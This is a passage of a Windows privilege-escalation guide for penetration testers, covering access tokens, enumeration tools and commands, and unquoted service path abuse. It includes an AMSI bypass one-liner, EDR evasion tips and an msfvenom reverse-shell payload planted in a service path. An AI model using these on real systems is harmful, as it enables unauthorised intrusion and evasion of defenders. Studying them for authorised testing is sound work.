windows-privesc.md (95715B)
1 --- 2 title: "Windows Privilege Escalation" 3 description: "Windows privesc master guide: token/privilege abuse, services, registry, AlwaysInstallElevated, potatoes." 4 category: privilege-escalation 5 tags: [privilege-escalation, windows, post-exploitation] 6 tools: [winPEAS, PowerUp, JuicyPotato] 7 difficulty: advanced 8 updated: "2026-09-17" 9 source: "vault:PrivEsc/PrivEsc - Windows.md" 10 --- 11 12 # Windows Privilege Escalation Master Guide (2026 Edition) 13 14 15 16 --- 17 #WindowsPrivilegeEscalation #Privileges #PrivilegeEscalation 18 ## Table of Contents 19 20 1. [Introduction & Philosophy](#i-introduction--philosophy) 21 2. [Enumeration (The Foundation)](#ii-enumeration-the-foundation) 22 3. [Configuration & Service Exploits](#iii-configuration--service-exploits) 23 4. [Credential Harvesting & Secrets](#iv-credential-harvesting--secrets) 24 5. [Kernel & OS Vulnerabilities](#v-kernel--os-vulnerabilities) 25 6. [Token Manipulation & Potato Attacks](#vi-token-manipulation--potato-attacks) 26 7. [Defense & OPSEC](#vii-defense--opsec) 27 8. [The Ultimate Cheat Sheet](#viii-the-ultimate-cheat-sheet) 28 9. [2026 Addendum: Modern Attack Surface](#ix-2026-addendum-modern-attack-surface) 29 30 --- 31 32 # I. Introduction & Philosophy 33 34 ## 1.1 The Windows Privilege Model 35 36 Windows employs a multi-layered security architecture built around three core concepts: **Security Identifiers (SIDs)**, **Access Tokens**, and **Integrity Levels**. Understanding these fundamentals is essential before attempting any privilege escalation technique. 37 38 ### 1.1.1 Security Identifiers (SIDs) 39 40 Every security principal in Windows—users, groups, computers, and services—receives a unique Security Identifier (SID) that persists for the lifetime of that principal. SIDs are the foundation of Windows access control. 41 42 **SID Structure:** 43 ``` 44 S-R-X-Y1-Y2-...-Yn-RID 45 ``` 46 47 | Component | Description | Example | 48 |-----------|-------------|---------| 49 | S | Literal prefix indicating SID | S | 50 | R | Revision level (always 1) | 1 | 51 | X | Identifier Authority | 5 (NT Authority) | 52 | Y1-Yn | Subauthority values | 21-3623811015-3361044348-30300820 | 53 | RID | Relative Identifier | 1013 | 54 55 **Well-Known SIDs Critical for PrivEsc:** 56 57 | SID | Name | Significance | 58 |-----|------|--------------| 59 | S-1-5-18 | NT AUTHORITY\SYSTEM | Highest privilege local account | 60 | S-1-5-19 | NT AUTHORITY\LOCAL SERVICE | Reduced privilege service account | 61 | S-1-5-20 | NT AUTHORITY\NETWORK SERVICE | Network-facing service account | 62 | S-1-5-32-544 | BUILTIN\Administrators | Local admin group | 63 | S-1-5-32-551 | BUILTIN\Backup Operators | Can bypass file ACLs | 64 | S-1-5-32-548 | BUILTIN\Account Operators | Can modify non-protected users | 65 | S-1-5-32-549 | BUILTIN\Server Operators | Can modify services on DCs | 66 | S-1-5-32-550 | BUILTIN\Print Operators | Can load drivers on DCs | 67 | S-1-1-0 | Everyone | All authenticated users | 68 | S-1-5-11 | Authenticated Users | Domain-authenticated users | 69 70 ### 1.1.2 Access Tokens 71 72 When a user authenticates to Windows, the Local Security Authority Subsystem Service (LSASS) creates an **access token** containing: 73 74 - User SID 75 - Group SIDs (all groups the user belongs to) 76 - Privilege list (user rights) 77 - Integrity level 78 - Session ID 79 - Token type (Primary or Impersonation) 80 81 **Token Types:** 82 83 | Type | Description | PrivEsc Relevance | 84 |------|-------------|-------------------| 85 | Primary Token | Attached to processes, represents security context | Target for token stealing | 86 | Impersonation Token | Used by threads to act on behalf of another user | Potato attacks exploit these | 87 | Delegation Token | Extended impersonation for multi-hop authentication | Kerberos double-hop scenarios | 88 89 **Impersonation Levels:** 90 91 | Level | Description | Exploitability | 92 |-------|-------------|----------------| 93 | Anonymous | No identification | Cannot impersonate | 94 | Identification | Can identify but not impersonate | Limited use | 95 | Impersonation | Can impersonate on local system | Primary target for Potato attacks | 96 | Delegation | Can impersonate across network | Most powerful, enables lateral movement | 97 98 ### 1.1.3 Integrity Levels 99 100 Windows Vista introduced Mandatory Integrity Control (MIC), adding a hierarchical trust layer: 101 102 | Level | Value | Description | Examples | 103 |-------|-------|-------------|----------| 104 | Untrusted | 0x0000 | Processes with restricted tokens | Sandboxed processes | 105 | Low | 0x1000 | Internet-facing applications | Protected Mode IE, Edge | 106 | Medium | 0x2000 | Standard user processes | Most user applications | 107 | High | 0x3000 | Elevated/Administrator processes | Admin cmd.exe | 108 | System | 0x4000 | Operating system processes | Services, SYSTEM processes | 109 | Protected Process | 0x5000 | Anti-malware and DRM | Windows Defender, LSASS (PPL) | 110 111 **Integrity Level Verification:** 112 ```powershell 113 whoami /groups | findstr "Mandatory" 114 ``` 115 116 Output interpretation: 117 ``` 118 Mandatory Label\Medium Mandatory Level Label S-1-16-8192 119 ``` 120 - `S-1-16-4096` = Low Integrity 121 - `S-1-16-8192` = Medium Integrity 122 - `S-1-16-12288` = High Integrity 123 - `S-1-16-16384` = System Integrity 124 125 ### 1.1.4 The Windows Authorization Process 126 127 When a subject (user/process) attempts to access an object (file/service/registry key): 128 129 1. **Token Presentation**: Process presents its access token 130 2. **Security Descriptor Retrieval**: System retrieves object's security descriptor containing: 131 - Owner SID 132 - Group SID 133 - DACL (Discretionary Access Control List) 134 - SACL (System Access Control List) 135 3. **ACE Evaluation**: System evaluates Access Control Entries in order: 136 - Explicit Deny ACEs evaluated first 137 - Explicit Allow ACEs evaluated second 138 - Inherited Deny ACEs third 139 - Inherited Allow ACEs last 140 4. **Access Decision**: Grant or deny based on cumulative permissions 141 142 **Critical Insight**: This process happens instantaneously for every resource access attempt. Attackers exploit this by: 143 - Manipulating tokens (impersonation attacks) 144 - Modifying security descriptors (weak permissions) 145 - Inserting themselves into the authorization process (service hijacking) 146 147 ## 1.2 Living off the Land (LotL) Philosophy in 2025 148 149 Modern Windows environments deploy sophisticated endpoint detection capabilities—Windows 11 24H2 and Server 2025 include Microsoft Defender for Endpoint with advanced behavioral detection, AMSI integration across PowerShell/VBScript/JavaScript, and Credential Guard protection. Traditional attack tools trigger immediate alerts. 150 151 ### 1.2.1 The LotL Imperative 152 153 Living off the Land Binaries (LOLBins) are Microsoft-signed executables that: 154 - Bypass application whitelisting (AppLocker, WDAC) 155 - Avoid signature-based detection 156 - Blend with legitimate system activity 157 - Provide plausible deniability 158 159 **2025 LOLBin Categories for PrivEsc:** 160 161 | Category | Examples | Use Case | 162 |----------|----------|----------| 163 | File Transfer | certutil, bitsadmin, curl.exe | Tool staging | 164 | Execution | rundll32, regsvr32, mshta, wmic | Payload execution | 165 | Compilation | csc.exe, msbuild.exe | On-target compilation | 166 | Service Manipulation | sc.exe, reg.exe | Service attacks | 167 | Credential Access | cmdkey, vaultcmd | Credential harvesting | 168 169 ### 1.2.2 The 2025 Detection Landscape 170 171 **Current EDR Capabilities to Evade:** 172 173 | Technology | What It Detects | Evasion Strategy | 174 |------------|-----------------|------------------| 175 | ETW (Event Tracing for Windows) | Process creation, API calls, network | ETW patching, indirect syscalls | 176 | AMSI (Antimalware Scan Interface) | PowerShell, VBScript, JavaScript content | AMSI bypass, obfuscation | 177 | Kernel Callbacks | Driver loading, process/thread creation | Callback removal (requires kernel access) | 178 | Credential Guard | LSASS credential dumping | Target non-protected credentials | 179 | Protected Process Light (PPL) | LSASS process access | Bypass via vulnerable drivers | 180 | Smart App Control (SAC) | Reputation-based blocking | Use signed binaries, trusted publishers | 181 182 **Modern OPSEC Principles:** 183 184 1. **Minimize footprint**: Use built-in tools wherever possible 185 2. **Blend with noise**: Execute during normal business hours 186 3. **Avoid known-bad indicators**: Don't use default tool parameters/filenames 187 4. **Chain techniques**: Combine multiple weak findings into escalation path 188 5. **Test detection**: Use Defender-enabled systems during development 189 190 ### 1.2.3 Primary Privilege Escalation Targets 191 192 | Target Account | Description | Priority | 193 |----------------|-------------|----------| 194 | NT AUTHORITY\SYSTEM | LocalSystem account—more privileges than local admin | Highest | 195 | BUILTIN\Administrators | Local administrator group membership | High | 196 | Domain Admins | Domain-wide administrative access | Critical (if domain-joined) | 197 | Specific Service Accounts | May have elevated privileges for specific tasks | Situational | 198 199 **Escalation Philosophy:** 200 1. Always enumerate first—understand your current context 201 2. Identify the shortest path to your target privilege level 202 3. Have backup techniques prepared 203 4. Document every step for client reporting 204 5. Consider operational impact before executing 205 206 --- 207 208 # II. Enumeration (The Foundation) 209 210 ## 2.1 Automated Tools Deep Dive 211 212 Automated enumeration tools rapidly identify privilege escalation vectors but generate significant noise. Understanding each tool's capabilities, limitations, and detection footprint is essential for operational success. 213 214 ### 2.1.1 Tool Comparison Matrix 215 216 | Tool | Language | Purpose | OPSEC Rating | Detection Risk | Best For | 217 |------|----------|---------|--------------|----------------|----------| 218 | WinPEAS | C#/Batch | Comprehensive enumeration | ⚠️ Low | High (flagged by most AV) | Lab environments, thorough analysis | 219 | Seatbelt | C# | Security-focused enumeration | ⚠️ Medium | Medium-High | Targeted checks, modular execution | 220 | SharpUp | C# | PowerUp port to C# | ⚠️ Medium | Medium | .NET environments, compiled execution | 221 | PowerUp | PowerShell | Service/registry misconfig | ⚠️ Low | High (AMSI) | Quick assessment, script execution | 222 | PrivescCheck | PowerShell | Modern Windows checks | ⚠️ Medium | Medium (AMSI bypass options) | Windows 10/11, Server 2019+ | 223 | JAWS | PowerShell | PS 2.0 compatible | ✅ Higher | Lower (legacy systems) | Older systems, PS 2.0 environments | 224 | Watson | C# | Kernel exploit suggester | ⚠️ Medium | Medium | Patch level analysis | 225 | Sherlock | PowerShell | Legacy exploit suggester | ❌ Obsolete | High | Legacy (Windows 7/2008 R2) | 226 | BeRoot | Python | Multi-platform privesc | ⚠️ Medium | Medium | Cross-platform assessments | 227 228 ### 2.1.2 WinPEAS Deep Dive 229 230 WinPEAS is the most comprehensive Windows privilege escalation enumeration tool, performing hundreds of checks across system configuration, services, applications, and credentials. 231 232 **Execution Methods:** 233 234 ```batch 235 :: Basic execution 236 winpeasx64.exe 237 238 :: Quiet mode (reduced output) 239 winpeasx64.exe quiet 240 241 :: Fast mode (skip slow checks) 242 winpeasx64.exe fast 243 244 :: Specific checks only 245 winpeasx64.exe servicesinfo 246 247 :: Log output to file 248 winpeasx64.exe log=C:\temp\winpeas.txt 249 250 :: No color (for logging) 251 winpeasx64.exe notcolor 252 ``` 253 254 **WinPEAS Check Categories:** 255 256 | Category | What It Checks | PrivEsc Relevance | 257 |----------|----------------|-------------------| 258 | System Information | OS version, hotfixes, AV status | Kernel exploits, missing patches | 259 | Users Information | User privileges, groups, sessions | Token privileges, group abuse | 260 | Processes Information | Running processes, DLLs | DLL hijacking, process injection | 261 | Services Information | Service permissions, paths | Unquoted paths, weak permissions | 262 | Applications Information | Installed software, startup | Application-specific vulns | 263 | Network Information | Interfaces, listening ports | Internal services, port forwarding | 264 | Windows Credentials | Stored credentials, SAM access | Direct credential theft | 265 | Browser Information | Saved passwords, history | Credential harvesting | 266 | Interesting Files | Config files, scripts, keys | Credential discovery | 267 268 **WinPEAS OPSEC Considerations:** 269 270 - **Detection**: Flagged by 50+ AV engines; Windows Defender blocks by default 271 - **Mitigation**: Compile from source with obfuscation, or use module-by-module approach 272 - **Alternative**: Run individual checks manually using equivalent commands 273 274 ### 2.1.3 Seatbelt Deep Dive 275 276 Seatbelt performs targeted security checks with modular execution capability, making it more suitable for operational environments. 277 278 **Execution Methods:** 279 280 ```powershell 281 # Run all checks 282 .\Seatbelt.exe -group=all 283 284 # Run specific command groups 285 .\Seatbelt.exe -group=system 286 .\Seatbelt.exe -group=user 287 .\Seatbelt.exe -group=misc 288 289 # Run specific commands 290 .\Seatbelt.exe TokenPrivileges 291 .\Seatbelt.exe WindowsCredentialFiles 292 .\Seatbelt.exe CredEnum 293 294 # Remote execution (requires admin on remote host) 295 .\Seatbelt.exe -group=remote -computername=DC01.corp.local 296 ``` 297 298 **Key Seatbelt Commands for PrivEsc:** 299 300 | Command | Description | Priority | 301 |---------|-------------|----------| 302 | `TokenPrivileges` | Current token privileges | Critical | 303 | `WindowsCredentialFiles` | Credential Manager files | High | 304 | `CredEnum` | Enumerate stored credentials | High | 305 | `InterestingProcesses` | Security-relevant processes | Medium | 306 | `LocalGroups` | Local group membership | High | 307 | `MappedDrives` | Network drives (may have creds) | Medium | 308 | `PowerShellHistory` | PS command history | High | 309 | `PuttyHostKeys` | Saved SSH servers | Medium | 310 | `SlackDownloads` | Slack file downloads | Low | 311 | `TokenGroups` | All group memberships | Critical | 312 313 ### 2.1.4 SharpUp Deep Dive 314 315 SharpUp is a C# port of PowerUp, providing the same service/registry misconfiguration checks in a compiled format that bypasses AMSI. 316 317 **Execution:** 318 319 ```powershell 320 # Full audit 321 .\SharpUp.exe audit 322 323 # Check specific vulnerabilities 324 .\SharpUp.exe HijackablePaths 325 .\SharpUp.exe ModifiableServiceBinaries 326 .\SharpUp.exe ModifiableServices 327 .\SharpUp.exe UnquotedServicePath 328 ``` 329 330 **SharpUp Check Categories:** 331 332 | Check | Description | Exploitation Path | 333 |-------|-------------|-------------------| 334 | `AlwaysInstallElevated` | MSI packages install as SYSTEM | Malicious MSI installation | 335 | `CachedGPPPassword` | Group Policy Preferences passwords | Direct credential recovery | 336 | `HijackablePaths` | Writable PATH directories | DLL hijacking | 337 | `McAfeeSitelistFiles` | McAfee credential files | Credential extraction | 338 | `ModifiableScheduledTasks` | Writable scheduled task binaries | Binary replacement | 339 | `ModifiableServiceBinaries` | Writable service executables | Binary replacement | 340 | `ModifiableServiceRegistryKeys` | Writable service registry keys | ImagePath modification | 341 | `ModifiableServices` | Services with weak DACLs | Service reconfiguration | 342 | `ProcessDLLHijack` | Running processes vulnerable to DLL hijack | DLL injection | 343 | `RegistryAutoLogon` | Autologon credentials in registry | Credential recovery | 344 | `RegistryAutoRuns` | Writable autorun locations | Persistence/escalation | 345 | `UnattendedInstallFiles` | Unattend.xml with credentials | Credential recovery | 346 | `UnquotedServicePath` | Unquoted service paths with spaces | Binary planting | 347 348 ### 2.1.5 PowerUp Deep Dive 349 350 PowerUp remains the most widely-used PowerShell privilege escalation framework despite AMSI challenges. 351 352 **Execution Methods:** 353 354 ```powershell 355 # Import the module 356 Import-Module .\PowerUp.ps1 357 358 # Run all checks 359 Invoke-AllChecks 360 361 # Run all checks and export to HTML 362 Invoke-AllChecks -HTMLReport 363 364 # Individual function execution 365 Get-UnquotedService 366 Get-ModifiableServiceFile 367 Get-ModifiableService 368 Get-ServiceDetail -Name "VulnerableService" 369 ``` 370 371 **AMSI Bypass for PowerUp (2025):** 372 373 ```powershell 374 # Method 1: Reflection-based bypass 375 $a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like "*iUtils") {$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like "*Context") {$f=$e}};$g=$f.GetValue($null);[IntPtr]$ptr=$g;[Int32[]]$buf=@(0);[System.Runtime.InteropServices.Marshal]::Copy($buf,0,$ptr,1) 376 377 # Method 2: PowerShell downgrade (if PS 2.0 available) 378 powershell.exe -version 2 -ep bypass -file PowerUp.ps1 379 380 # Method 3: Obfuscated import 381 $code = [System.IO.File]::ReadAllText("C:\temp\PowerUp.ps1") 382 $code = $code -replace 'Invoke-AllChecks', 'Invoke-AC' 383 IEX $code 384 Invoke-AC 385 ``` 386 387 **Key PowerUp Functions:** 388 389 | Function | Purpose | Auto-Exploit Available | 390 |----------|---------|------------------------| 391 | `Get-UnquotedService` | Find unquoted service paths | `Write-ServiceBinary` | 392 | `Get-ModifiableServiceFile` | Find writable service binaries | `Install-ServiceBinary` | 393 | `Get-ModifiableService` | Find services with weak DACLs | `Invoke-ServiceAbuse` | 394 | `Get-RegistryAlwaysInstallElevated` | Check AlwaysInstallElevated | `Write-UserAddMSI` | 395 | `Get-RegistryAutoLogon` | Check for autologon creds | N/A | 396 | `Get-CachedGPPPassword` | Find cached GPP passwords | N/A | 397 | `Get-UnattendedInstallFile` | Find unattend.xml files | N/A | 398 | `Get-ModifiableRegistryAutoRun` | Find writable autorun keys | N/A | 399 | `Get-PathDLLHijack` | Find PATH DLL hijacking | `Write-HijackDll` | 400 401 ### 2.1.6 PrivescCheck Deep Dive 402 403 PrivescCheck is a modern PowerShell script designed for Windows 10/11 and Server 2019/2022/2025, with built-in AMSI evasion options. 404 405 **Execution Methods:** 406 407 ```powershell 408 # Basic execution 409 .\PrivescCheck.ps1 410 411 # Extended mode (more checks) 412 .\PrivescCheck.ps1 -Extended 413 414 # Specific category 415 .\PrivescCheck.ps1 -Extended -Category "Services" 416 417 # Export results 418 .\PrivescCheck.ps1 -Extended -Report PrivescCheck_Results -Format HTML,CSV 419 420 # Audit mode (minimal changes) 421 .\PrivescCheck.ps1 -Audit 422 ``` 423 424 **PrivescCheck Categories:** 425 426 | Category | Checks Performed | 427 |----------|------------------| 428 | User | Current user, privileges, groups, environment | 429 | Services | Service permissions, unquoted paths, registry | 430 | Scheduled Tasks | Task permissions, binary paths | 431 | Applications | Installed apps, startup programs | 432 | Credentials | Stored credentials, cached passwords | 433 | Hardening | Security features status (UAC, LSA, etc.) | 434 | Configuration | System configuration weaknesses | 435 | Network | Listening services, firewall rules | 436 437 ## 2.2 Manual Enumeration Methodology 438 439 Automated tools are essential but understanding manual enumeration is critical when: 440 - Tools are detected/blocked by EDR 441 - Limited write access prevents tool upload 442 - Stealth is paramount 443 - Verifying automated tool findings 444 445 ### 2.2.1 System Information Gathering 446 447 ```batch 448 :: Basic system information 449 systeminfo 450 451 :: Hostname and domain 452 hostname 453 echo %USERDOMAIN% 454 455 :: OS version (registry method - more reliable) 456 reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v ProductName 457 reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v CurrentBuild 458 reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v ReleaseId 459 460 :: Architecture 461 wmic os get osarchitecture 462 echo %PROCESSOR_ARCHITECTURE% 463 464 :: Environment variables 465 set 466 467 :: System uptime (for patch assessment) 468 net statistics server | findstr "Statistics since" 469 ``` 470 471 ```powershell 472 # PowerShell system enumeration 473 [System.Environment]::OSVersion.Version 474 Get-ComputerInfo | Select-Object WindowsProductName, WindowsVersion, OsHardwareAbstractionLayer 475 Get-CimInstance Win32_OperatingSystem | Select-Object Caption, Version, BuildNumber, OSArchitecture 476 ``` 477 478 ### 2.2.2 Patch Level Enumeration 479 480 Understanding patch level is critical for kernel exploit selection. 481 482 ```batch 483 :: List installed hotfixes (CMD) 484 wmic qfe list brief 485 486 :: Filter for security updates 487 wmic qfe list brief | findstr /i "security" 488 489 :: Specific KB search 490 wmic qfe | findstr "KB5034441" 491 ``` 492 493 ```powershell 494 # PowerShell hotfix enumeration 495 Get-HotFix | Select-Object HotFixID, Description, InstalledOn | Sort-Object InstalledOn -Descending 496 497 # Check for specific critical patches 498 $criticalKBs = @("KB5034441", "KB5031356", "KB5028185") 499 $installed = Get-HotFix | Select-Object -ExpandProperty HotFixID 500 foreach ($kb in $criticalKBs) { 501 if ($installed -contains $kb) { 502 Write-Host "[+] $kb is installed" -ForegroundColor Green 503 } else { 504 Write-Host "[-] $kb is MISSING" -ForegroundColor Red 505 } 506 } 507 508 # Last update check 509 (Get-HotFix | Sort-Object InstalledOn -Descending | Select-Object -First 1).InstalledOn 510 ``` 511 512 **Critical Missing Patch Indicators:** 513 514 | Scenario | Implication | 515 |----------|-------------| 516 | No patches in 6+ months | Likely vulnerable to multiple kernel exploits | 517 | Missing servicing stack updates | May have known privilege escalation vulns | 518 | Defender definitions outdated | AV may be disabled | 519 520 ### 2.2.3 User and Group Enumeration 521 522 ```batch 523 :: Current user context 524 whoami 525 echo %USERNAME% 526 527 :: Current user privileges (CRITICAL) 528 whoami /priv 529 530 :: Current user group membership 531 whoami /groups 532 533 :: All information about current user 534 whoami /all 535 536 :: List all local users 537 net user 538 539 :: Specific user details 540 net user Administrator 541 net user %USERNAME% 542 543 :: List all local groups 544 net localgroup 545 546 :: Members of specific groups 547 net localgroup Administrators 548 net localgroup "Remote Desktop Users" 549 net localgroup "Backup Operators" 550 551 :: Password policy 552 net accounts 553 ``` 554 555 ```powershell 556 # Get current user privileges with state 557 whoami /priv | Select-String "Se" 558 559 # Enumerate local admins 560 Get-LocalGroupMember -Group "Administrators" | Select-Object Name, PrincipalSource 561 562 # Check specific group memberships 563 $groups = @("Administrators", "Backup Operators", "Remote Desktop Users", "Remote Management Users") 564 foreach ($group in $groups) { 565 Write-Host "`n[*] Members of $group :" -ForegroundColor Cyan 566 Get-LocalGroupMember -Group $group -ErrorAction SilentlyContinue | ForEach-Object { Write-Host " $($_.Name)" } 567 } 568 569 # Get user description (sometimes contains passwords!) 570 Get-LocalUser | Select-Object Name, Enabled, Description 571 ``` 572 573 **Privilege Escalation Priority Privileges:** 574 575 | Privilege | State | Exploitation Path | 576 |-----------|-------|-------------------| 577 | SeImpersonatePrivilege | Enabled | Potato attacks (GodPotato, PrintSpoofer) | 578 | SeAssignPrimaryTokenPrivilege | Enabled | Potato attacks, token manipulation | 579 | SeDebugPrivilege | Enabled | LSASS dumping, process injection | 580 | SeBackupPrivilege | Enabled | SAM/SYSTEM extraction, NTDS.dit theft | 581 | SeRestorePrivilege | Enabled | DLL hijacking via file replacement | 582 | SeTakeOwnershipPrivilege | Enabled | Take ownership of any file | 583 | SeLoadDriverPrivilege | Enabled | Load vulnerable kernel driver | 584 | SeSecurityPrivilege | Enabled | Manipulate audit logs | 585 | SeTcbPrivilege | Enabled | Act as part of OS (impersonate anyone) | 586 587 ### 2.2.4 Network Enumeration 588 589 ```batch 590 :: Interface configuration 591 ipconfig /all 592 593 :: Routing table 594 route print 595 596 :: ARP cache (recently communicated hosts) 597 arp -a 598 599 :: Active connections and listening ports 600 netstat -ano 601 602 :: Filter for listening ports 603 netstat -ano | findstr "LISTENING" 604 605 :: Firewall status 606 netsh advfirewall show allprofiles 607 608 :: Firewall rules 609 netsh advfirewall firewall show rule name=all 610 ``` 611 612 ```powershell 613 # PowerShell network enumeration 614 Get-NetIPConfiguration 615 Get-NetRoute | Where-Object {$_.NextHop -ne "0.0.0.0"} | Select-Object DestinationPrefix, NextHop, InterfaceAlias 616 Get-NetTCPConnection -State Listen | Select-Object LocalAddress, LocalPort, OwningProcess | Sort-Object LocalPort 617 618 # Identify process for listening port 619 $listeners = Get-NetTCPConnection -State Listen 620 foreach ($listener in $listeners) { 621 $proc = Get-Process -Id $listener.OwningProcess -ErrorAction SilentlyContinue 622 Write-Host "$($listener.LocalAddress):$($listener.LocalPort) -> $($proc.ProcessName) (PID: $($listener.OwningProcess))" 623 } 624 ``` 625 626 **Internal Service Discovery:** 627 628 | Binding | Significance | 629 |---------|--------------| 630 | 127.0.0.1:PORT | Localhost-only service (may lack authentication) | 631 | 0.0.0.0:PORT | Listening on all interfaces | 632 | 10.x.x.x:PORT | Listening on specific internal interface | 633 634 Common internal services to investigate: 635 - MySQL (3306), MSSQL (1433), PostgreSQL (5432) 636 - Splunk (8089), Elasticsearch (9200), Redis (6379) 637 - Management interfaces (8080, 8443, 9000) 638 639 ### 2.2.5 Running Processes and Services 640 641 ```batch 642 :: List all running processes with services 643 tasklist /svc 644 645 :: Detailed process list 646 tasklist /v 647 648 :: Running services 649 sc query 650 651 :: Services in specific state 652 sc query state= all | findstr "SERVICE_NAME STATE" | more 653 654 :: Service details 655 sc qc "ServiceName" 656 657 :: Service permissions (using sc) 658 sc sdshow "ServiceName" 659 ``` 660 661 ```powershell 662 # Processes with user context 663 Get-Process -IncludeUserName | Select-Object ProcessName, Id, UserName | Sort-Object UserName 664 665 # Services not running as SYSTEM (potentially exploitable) 666 Get-WmiObject Win32_Service | Where-Object {$_.StartName -notmatch "LocalSystem|LocalService|NetworkService"} | 667 Select-Object Name, StartName, PathName, State 668 669 # Services with Auto start 670 Get-Service | Where-Object {$_.StartType -eq "Automatic" -and $_.Status -eq "Running"} | 671 Select-Object Name, DisplayName, Status 672 673 # Identify AV/EDR processes 674 $avProcesses = @("MsMpEng", "MsSense", "SenseIR", "SenseNdr", "cb", "CylanceSvc", "CSFalconService", "Tanium", "Sysmon", "emet_service") 675 Get-Process | Where-Object {$avProcesses -contains $_.ProcessName} | Select-Object ProcessName, Id 676 ``` 677 678 ### 2.2.6 AV/EDR Enumeration 679 680 Identifying security products is essential for tool selection and evasion. 681 682 ```powershell 683 # Windows Defender status 684 Get-MpComputerStatus | Select-Object RealTimeProtectionEnabled, BehaviorMonitorEnabled, IoavProtectionEnabled, AntivirusEnabled 685 686 # Defender exclusions (if readable) 687 Get-MpPreference | Select-Object ExclusionPath, ExclusionExtension, ExclusionProcess 688 689 # Security Center products (WMI method) 690 Get-WmiObject -Namespace "root\SecurityCenter2" -Class AntiVirusProduct | Select-Object displayName, productState 691 Get-WmiObject -Namespace "root\SecurityCenter2" -Class AntiSpywareProduct | Select-Object displayName, productState 692 Get-WmiObject -Namespace "root\SecurityCenter2" -Class FirewallProduct | Select-Object displayName, productState 693 694 # Common AV process detection 695 $avIndicators = @{ 696 "MsMpEng" = "Windows Defender" 697 "MsSense" = "Microsoft Defender ATP" 698 "CSFalconService" = "CrowdStrike Falcon" 699 "cb" = "Carbon Black" 700 "CylanceSvc" = "Cylance" 701 "SentinelAgent" = "SentinelOne" 702 "Tanium" = "Tanium" 703 "emet_service" = "EMET" 704 "Sysmon" = "Sysmon" 705 } 706 707 foreach ($proc in $avIndicators.Keys) { 708 if (Get-Process -Name $proc -ErrorAction SilentlyContinue) { 709 Write-Host "[!] $($avIndicators[$proc]) detected ($proc)" -ForegroundColor Red 710 } 711 } 712 ``` 713 714 ### 2.2.7 Installed Software Enumeration 715 716 ```batch 717 :: WMI method (slow but comprehensive) 718 wmic product get name,version 719 720 :: Registry method (faster) 721 reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s | findstr /i "DisplayName DisplayVersion" 722 reg query "HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall" /s | findstr /i "DisplayName DisplayVersion" 723 ``` 724 725 ```powershell 726 # Installed programs via registry 727 $32bit = Get-ItemProperty "HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | 728 Select-Object DisplayName, DisplayVersion, Publisher 729 $64bit = Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*" | 730 Select-Object DisplayName, DisplayVersion, Publisher 731 ($32bit + $64bit) | Where-Object {$_.DisplayName} | Sort-Object DisplayName | Format-Table -AutoSize 732 ``` 733 734 ### 2.2.8 Named Pipes Enumeration 735 736 Named pipes are inter-process communication channels that can be exploited for privilege escalation. 737 738 ```batch 739 :: List named pipes (Sysinternals) 740 pipelist.exe /accepteula 741 742 :: Check pipe permissions 743 accesschk.exe /accepteula -w \\.\pipe\* -v 744 accesschk.exe /accepteula \\.\pipe\spoolss -v 745 ``` 746 747 ```powershell 748 # List named pipes (PowerShell) 749 Get-ChildItem \\.\pipe\ | Select-Object Name 750 751 # Check specific pipe permissions 752 (Get-Acl \\.\pipe\lsass).Access | Format-Table IdentityReference, FileSystemRights 753 ``` 754 755 --- 756 757 # III. Configuration & Service Exploits 758 759 ## 3.1 Windows Services Exploitation 760 761 Windows services represent one of the most reliable privilege escalation vectors. Services run with specific account privileges (often SYSTEM) and have configuration files, binaries, and registry keys that may be vulnerable to manipulation. 762 763 ### 3.1.1 Understanding Service Architecture 764 765 **Service Accounts and Their Privileges:** 766 767 | Account | Privileges | Network Access | PrivEsc Value | 768 |---------|-----------|----------------|---------------| 769 | LocalSystem (SYSTEM) | Full system access | Machine account credentials | Highest | 770 | LocalService | Limited local access | Anonymous network access | Medium | 771 | NetworkService | Limited local access | Machine account credentials | Medium | 772 | Custom account | Varies | Depends on account | Varies | 773 774 **Service Components:** 775 776 | Component | Location | Attack Vector | 777 |-----------|----------|---------------| 778 | Binary Path | File system | Binary replacement, DLL hijacking | 779 | Registry Key | HKLM\SYSTEM\CurrentControlSet\Services | ImagePath modification | 780 | Service DACL | Security descriptor | Weak service permissions | 781 | DLL Dependencies | Various | DLL search order hijacking | 782 783 ### 3.1.2 Unquoted Service Paths 784 785 When a service binary path contains spaces and is not enclosed in quotes, Windows will attempt to locate the executable by trying each "break point" in the path. 786 787 **Example Vulnerable Path:** 788 ``` 789 C:\Program Files\Vulnerable Application\Sub Directory\service.exe 790 ``` 791 792 **Windows Search Order:** 793 1. `C:\Program.exe` 794 2. `C:\Program Files\Vulnerable.exe` 795 3. `C:\Program Files\Vulnerable Application\Sub.exe` 796 4. `C:\Program Files\Vulnerable Application\Sub Directory\service.exe` 797 798 **Detection:** 799 800 ```batch 801 :: CMD detection 802 wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """ 803 804 :: PowerShell detection 805 Get-CimInstance Win32_Service | Where-Object { 806 $_.PathName -notmatch '^"' -and 807 $_.PathName -match '\s' -and 808 $_.PathName -notmatch 'c:\\windows' 809 } | Select-Object Name, PathName, StartMode, State 810 ``` 811 812 **Exploitation:** 813 814 ```powershell 815 # Step 1: Verify write permissions to target directory 816 icacls "C:\Program Files\Vulnerable Application" 817 818 # Step 2: Check service start mode 819 sc qc "VulnerableService" 820 821 # Step 3: Generate malicious binary 822 msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.5 LPORT=443 -f exe -o Vulnerable.exe 823 824 # Step 4: Place binary in exploitable path 825 copy Vulnerable.exe "C:\Program Files\Vulnerable.exe" 826 827 # Step 5: Restart service (or wait for system reboot) 828 sc stop VulnerableService 829 sc start VulnerableService 830 ``` 831 832 **Verification Script:** 833 834 ```powershell 835 function Find-UnquotedPaths { 836 $services = Get-CimInstance Win32_Service | Where-Object 